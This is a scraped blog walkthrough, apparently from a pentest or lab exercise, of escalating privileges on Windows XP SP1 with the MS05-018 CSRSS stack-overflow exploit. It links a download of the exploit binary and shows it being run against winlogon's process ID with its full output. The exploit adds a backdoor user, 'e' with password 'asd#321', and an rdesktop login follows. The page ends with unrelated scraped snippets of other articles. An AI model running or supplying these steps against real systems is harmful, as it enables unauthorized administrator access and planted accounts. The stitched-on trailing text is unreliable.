Windows XP SP1 Privilege Escalation

MS05-018

MS05-018

Works for Windows 2K SP3/4 | Windows XP SP1/2

Download ms05-018.exe:

https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/MS05018%E2%80%94CSRSS.EXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/MS05018%E2%80%94CSRSS.EXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/tool

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 VULNBOX
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 1 Build 2600
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\System32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB893803v2 - Update

C:\Inetpub\wwwroot>MS05-018.exe
ms5.exe
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
compile by Iceskysl [IST] --->www.iceskysl.net

Usage: ms5.exe pid

[+] PID=440 Process=winlogon.exe

C:\Inetpub\wwwroot>MS05-018.exe 440
ms5.exe 440
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
compile by Iceskysl [IST] --->www.iceskysl.net

[+] FreeConsole ok.
[+] AllocConsole ok.
[+] Get Console Title OK:"ms5.exe 440"
[+] bingo! found hwnd=70038
[+] start search "FF E4" in ntdll.dll
[+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]
[+] CreateFileMapping OK!
[+] MapViewOfFile OK!
[+] Send Exploit!
[+] Done.

It‘s will successful  add user :
username=e
password=asd#321

[email protected]:~# rdesktop -u e -p asd#321  x.x.x.x

原文地址:https://www.cnblogs.com/xiaoxiaoleo/p/8452004.html

时间: 2024-10-10 03:48:50

Windows XP SP1 Privilege Escalation的相关文章

使用Nessus扫描Windows XP SP1之360安全软件

使用Nessus扫描Windows XP SP1之360安全软件 在Windows操作系统中,用户都认为360是一款非常强大的安全软件.可以用来保护计算机不被病毒侵入,病毒文件的拦截等.但是,到底这款软件有多么强大,或者可能就是一款普通的安全软件.为了验证360这款软件到底是否强大,这里使用Nessus对Windows XP SP1操作系统,而且安装了360安全软件实施扫描.通过分析报告,看安装360与不安装是否有很大的差别,可否拦截Nessus扫描.下面是使用Nessus中Network Sc

[Eage、Eage S系列] 预装Win 8的机型更换Win7及Windows XP如何设置

本文档讲解预装Windows8 机型更换低版本操作系统的修改方法,由于ThinkPad电脑随机不带Windows 8恢复光盘,如果您仍想保留预装的正版Windows 8系统,请在更换系统之前创建恢复介质提前保留,创建方法见<创建恢复介质方法> 温馨提示:尊敬的联想用户,为了预防计算机数据意外丢失风险,建议您定期备份您的重要数据到第三方存储介质(如服务器.光盘.移动存储设备等),以确保您的数据安全. 操作方法: 1. 开机过程中点击F1进入到BIOS界面: 2. 进入Security---Sec

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员 http://zone.wooyun.org/content/17102 https://www.t00ls.net/thread-28706-1-1.html https://github.com/bidord/pykek ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an A

Acunetix WVS 10 - Local Privilege escalation

'''========================================================================Acunetix WVS 10 - from guest to Sytem (Local privilege escalation) CVE: CVE-2015-4027Author: (me) Daniele LinguaglossaAffected Product: Acunetix WVS 10Exploit: Local privilege

时序图与状态图(Rose) - Windows XP经典软件系列

最近开始了自己高级数据结构之旅,在这次旅行中,我将持续把一些高级的数据结构从理论到编码都过一遍,同时通过博客形式分享出来,希望大家指出不足之处! 二叉排序树是一种动态排序的数据结构,支持插入.删除.查找等操作,且平均时间复杂度为O(log(N)),但是普通二叉排序树不能保证树退化为一颗分支的情况,此时最坏情况下的时间复杂度为O(N).此时,平衡二叉树的产生了.平衡二叉树是一种动态调整平衡的数据结构,但理想的平衡二叉树很难,于是人们使用AVL.红黑树.Treap.伸展树等来替代平衡二叉树,这些数据

类图(Rose) - Windows XP经典软件系列

最近开始了自己高级数据结构之旅,在这次旅行中,我将持续把一些高级的数据结构从理论到编码都过一遍,同时通过博客形式分享出来,希望大家指出不足之处! 二叉排序树是一种动态排序的数据结构,支持插入.删除.查找等操作,且平均时间复杂度为O(log(N)),但是普通二叉排序树不能保证树退化为一颗分支的情况,此时最坏情况下的时间复杂度为O(N).此时,平衡二叉树的产生了.平衡二叉树是一种动态调整平衡的数据结构,但理想的平衡二叉树很难,于是人们使用AVL.红黑树.Treap.伸展树等来替代平衡二叉树,这些数据

在Windows XP下整合Apache+Tomcat+PHP

本篇文章主要是从安装JK插件方面来对整合Apache+Tomcat进行讲解. 以前在本机上做项目测试的时候,都是单独使用Tomcat,而没有像在服务器上一样用Apache+Tomcat这样的配置.但是整合Apache+Tomcat的好处人尽皆知.为什么我们不来试一试呢? 其实刚开始的时候并不是为了整合Apache和Tomcat而整合的,因为之前在我的PC机上根本就没 有装Apache,一个机缘--公司需要帮别人维护一个用PHP写的项目,于是为了测试PHP,所以我在PC机上装了个Apache,并安

windows xp,7,10,server 2003/2008下安装oracle 10g

在开发中我们经常用到oracle数据库.oracle现在有不同的版本,不同的项目由于开发时间不同而使用不同的oracle版本.由于各版本数据库功能存在不同,所以一但开发好后一般很难升级数据库版本.但我们所用的操作系统又在不断更新.许多人愿意尝试新的操作系统.由于操作系统兼容性的原因 ,oracle 10g在不同的Windows下的安装有一些不同. oracle 10g对Windows  XP 系统的兼容性最好,下载安装包之间双击运行即可. 在Windows server 2003中,直接双击运行

windows XP上实现python2.7.5和python3.4.3共存

windows XP上实现python2.7.5和python3.4.3共存过程记录: 1. 首先安装python2.7.5和python3.4.3,两个版本安装顺序不分前后; 2. 检查系统环境变量中是否存在以下四个变量,缺少则手动加入 c:\Python27; c:\Python27\Scripts; c:\Python34; c:\Python34\Scripts; (python安装路径为C:Python27则环境变量为c:\Python27;python安装路径为D:Python27则